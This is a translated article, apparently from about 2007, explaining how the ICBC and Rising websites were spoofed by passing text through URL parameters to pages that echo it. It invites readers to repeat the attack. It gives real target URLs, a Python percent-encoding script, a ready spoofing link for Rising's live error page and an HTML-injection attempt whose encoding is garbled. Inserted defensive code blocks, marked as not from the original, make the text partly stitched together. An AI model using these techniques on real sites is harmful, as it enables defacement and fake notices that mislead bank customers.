Working principle and attack program of the ICBC and Rising hacks

Source: Internet
Author: User

The websites of the Industrial and Commercial Bank of China (ICBC) and Rising have been attacked one after another. The attacks are not serious, but they have the air of a prank. For example, the attacked ICBC address is as follows:

http://www.icbc.com.cn/news/hotspot.jsp?Column=%C4%AA%B7%C7%CC%E1%D0%D1%A3%BA%B9%F3%D5%BE%B4%E6%D4%DA%D1%CF%D6%D8%B0%B2%C8%AB%CE%CA%CC%E2%A3%AC%C8%E7%D0%ED%BD%E2%BE%F6%C7%EB%C1%AA%CF%B5qq%A3%BA7540734%A3%AC%CB%F7%C8%A1%BB%E3%BF%EE%D5%CA%BA%C5%A1%A32006%C4%EA12%D4%C229%BA%C5

Testing shows it has since been repaired. The attacked Rising address is as follows:

http://buy.rising.com.cn/bank/Errorpage.aspx?MSG=%C8%F0%D0%C7%D2%B2%B2%BB%B9%FD%C8%E7%B4%CB%A3%AC%BA%D9%BA%D9%A3%A1%D5%D5%D1%F9%B1%BB%BA%DA%A3%A1%B3%B9%B5%D7%B5%C4%CD%EA%B5%B0%C1%CB%A3%AC%B2%BB%D4%B8%D4%B1%B9%A4%B6%BC%CC%F8%B2%DB%C4%D8%A3%BF%A1%A1%A1%A1%A3%E2%A3%F9%A1%A1%44%75%6F%6E

It's still a shame.

A web developer can see at a glance that this is done by passing parameters through the URL to an error-display or information-display page. Such pages often read an input parameter and display it on the page. Currently, many web development frameworks do not distinguish between parameters passed by GET and by POST, which leads to the spoofing vulnerability described above. In fact, these vulnerabilities only allow URL parameters to be used to display odd information on the page. For example, ICBC was spoofed into saying that it was about to close and that customers should transfer their deposits, and so on.
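An added example, not code from the original article or from either site: the echo pattern described above next to two fixes, showing that HTML-escaping alone stops injected markup but still displays attacker-chosen text, while a server-side message catalogue stops both. The template, message codes, requests and function names are assumptions.

```python
import html
from urllib.parse import parse_qs

# Assumed page template and message catalogue (not from either site).
TEMPLATE = '<html><body><p class="error">{}</p></body></html>'
MESSAGES = {
    "E_PAY_TIMEOUT": "The payment request timed out. Please try again.",
    "E_ORDER_MISSING": "The order could not be found.",
}
DEFAULT = "An error occurred. Please try again later."


def first(query_string, name):
    """Return the first value of a query parameter, or an empty string."""
    return parse_qs(query_string).get(name, [""])[0]


def render_vulnerable(query_string):
    """Echo the msg parameter verbatim: the pattern behind the spoofed pages."""
    return TEMPLATE.format(first(query_string, "msg"))


def render_escaped_only(query_string):
    """HTML-escape msg: markup is neutralised, arbitrary text still appears."""
    return TEMPLATE.format(html.escape(first(query_string, "msg")))


def render_hardened(query_string):
    """Accept only a message code; the displayed text never leaves the server."""
    code = first(query_string, "code")
    return TEMPLATE.format(html.escape(MESSAGES.get(code, DEFAULT)))


# Constructed requests: plain text, markup, and a catalogue code.
TEXT = "msg=This+site+is+closing"
MARKUP = "msg=%3Cmarquee%3Ehello%3C%2Fmarquee%3E"
CODE = "code=E_ORDER_MISSING&msg=This+site+is+closing"

if __name__ == "__main__":
    for render in (render_vulnerable, render_escaped_only, render_hardened):
        for request in (TEXT, MARKUP, CODE):
            print(render.__name__, "|", request, "->", render(request))
```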

Once the principle is understood, we can perform such an attack ourselves. First, take the URL containing the passed parameter and keep the part before the parameter value, that is, remove the characters such as %. Then append the information you want displayed. In practice this will generally fail: English text passes without trouble, but Chinese text runs into strange problems.

This is because most HTTP servers do not allow non-ASCII characters to be transmitted through URLs. A few can be configured to allow it, but that is rare. In addition, it is difficult to transmit non-printing characters, such as spaces.

There is, however, a way to pass non-ASCII strings through URLs. Generally the string is quote-encoded: each byte is converted to % followed by its two-digit hexadecimal value. In this way, any symbol can in theory be passed. For example, a space is passed as %20, which you will see frequently, including in the result URLs of some search engines.

Another problem is the Chinese encoding. The two common Chinese encodings are GBK and UTF-8. GB2312 is a subset of GBK, so it is covered by GBK. GBK and UTF-8 are incompatible with each other. Therefore, you must first determine the default encoding the website uses for Chinese characters, and then quote-encode the text in that encoding.

The following is a program that quote-encodes the input string, forcing UTF-8 encoding along the way, because most websites in China use UTF-8. The default encoding on Windows is GBK, so the program converts the input from GBK to UTF-8 before quote-encoding it. The string the program returns is the odd-looking string full of % signs. You can append it to a URL that accepts parameters.

According to testing, Rising's website uses gb2312 encoding. Readers can therefore comment out the encoding-conversion statement in the program themselves:

msg = unicode(msg, "GBK").encode("UTF-8")

To comment it out, add "#" before this statement. Then you can run the quote encoding yourself.

For example, if we start the program and enter the string "Rising is not good", the resulting code is

%E7%91%9E%E6%98%9F%E4%B9%9F%E4%B8%8D%E8%A1%8C%E5%95%8A

Of course, appending this string directly does not work: it shows up garbled. We first need to modify the program so that it does not convert to UTF-8. The encoding produced after the modification is as follows:

%C8%F0%D0%C7%D2%B2%B2%BB%D0%D0%B0%A1

Modify the URL of the website as follows:

http://buy.rising.com.cn/bank/Errorpage.aspx?MSG=%C8%F0%D0%C7%D2%B2%B2%BB%D0%D0%B0%A1

Enter the above URL in the address bar to see the chosen statement displayed. Of course, you can change it to anything you like. You only need to append the encoding obtained to the following URL prefix:

http://buy.rising.com.cn/bank/Errorpage.aspx?MSG=

To find the character set a particular website uses, view the page's source code and search for the following:

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

In this example, gb2312 is the Chinese character set. Based on this setting, you can decide whether to comment out the encoding-conversion statement in the program.
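The GBK versus UTF-8 point above, seen from the log side, as an added example that is not part of the original article: a triage helper that percent-decodes parameter values (strict UTF-8 first, then GBK) and flags free text or markup sent to a display parameter. The watched parameter names, request paths and function names are assumptions; the two encoded Chinese values are the ones quoted in this article.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

WATCHED = {"msg", "column"}  # assumed names of parameters a page echoes
MARKUP = re.compile(r"<\s*/?\s*[A-Za-z]")


def decode_value(raw):
    """Percent-decode a value; return (text, charset) trying UTF-8, then GBK."""
    data = unquote_to_bytes(raw.replace("+", " "))
    for charset in ("utf-8", "gbk"):
        try:
            return data.decode(charset), charset
        except UnicodeDecodeError:
            continue
    return data.decode("latin-1"), "latin-1"


def triage(request_target):
    """Return (name, charset, text, reasons) for each suspicious parameter."""
    findings = []
    for pair in urlsplit(request_target).query.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() not in WATCHED or not raw:
            continue
        text, charset = decode_value(raw)
        reasons = []
        if MARKUP.search(text):
            reasons.append("markup")
        if " " in text or any(ord(c) > 127 for c in text):
            reasons.append("free-text")
        if reasons:
            findings.append((name, charset, text, reasons))
    return findings


# Constructed request targets; the first two values are quoted in the article.
SAMPLES = [
    "/error?msg=%C8%F0%D0%C7%D2%B2%B2%BB%D0%D0%B0%A1",
    "/error?msg=%E7%91%9E%E6%98%9F%E4%B9%9F%E4%B8%8D%E8%A1%8C%E5%95%8A",
    "/error?msg=%3Cmarquee%3Ex%3C%2Fmarquee%3E",
    "/error?msg=E1001",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(target, "->", triage(target))
```

Both byte forms of the same message decode to identical text, so a rule written against the decoded text catches either encoding.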

Quote-encoding program code (Python):

# -*- coding: GBK -*-
# File: toquote.py
# Date: 2007-1-18
# Author: gashero
# Copyright @ 1999-2007, Harry gashero Liu.

"""
Script for generating quote-encoded strings that can be transmitted through URLs.
It can encode many symbols, including Chinese characters and special characters.
Before encoding, the input is converted from GBK to UTF-8, which suits the
default encoding of most web applications.
"""

import urllib
import msvcrt  # Windows only: used to wait for a key press before exiting

msg = raw_input('input your message: ')
# GBK-to-UTF-8 conversion; left commented out here for sites that use GBK/gb2312
# msg = unicode(msg, "GBK").encode("UTF-8")
retstr = ""
for ch in msg:
    # Emit each byte as % followed by two hexadecimal digits, zero-padded
    retstr += "%%%02X" % ord(ch)
print retstr
print "Press [any] key to exit!"
msvcrt.getch()

Just now, I wanted to bring up a special effect on Rising's error page, that is, the following code:

<marquee>Rising is not good</marquee>

After transcoding:

%3C%6D%61%72%71%75%65%3E%C8%F0%D0%C7%D2%B2%B2%BB%D0%D0%B0%A1%3C%2F%6D%61%72%71%75%65%65%3E

It is a pity that this brought up the .NET error configuration page instead, as follows:

Server Error in '/bank' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".

<!-- Web.Config Configuration File -->

<configuration>
    <system.web>
        <customErrors mode="Off"/>
    </system.web>
</configuration>

Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.

<!-- Web.Config Configuration File -->

<configuration>
    <system.web>
        <customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
    </system.web>
</configuration>

I hope Rising will make persistent efforts.
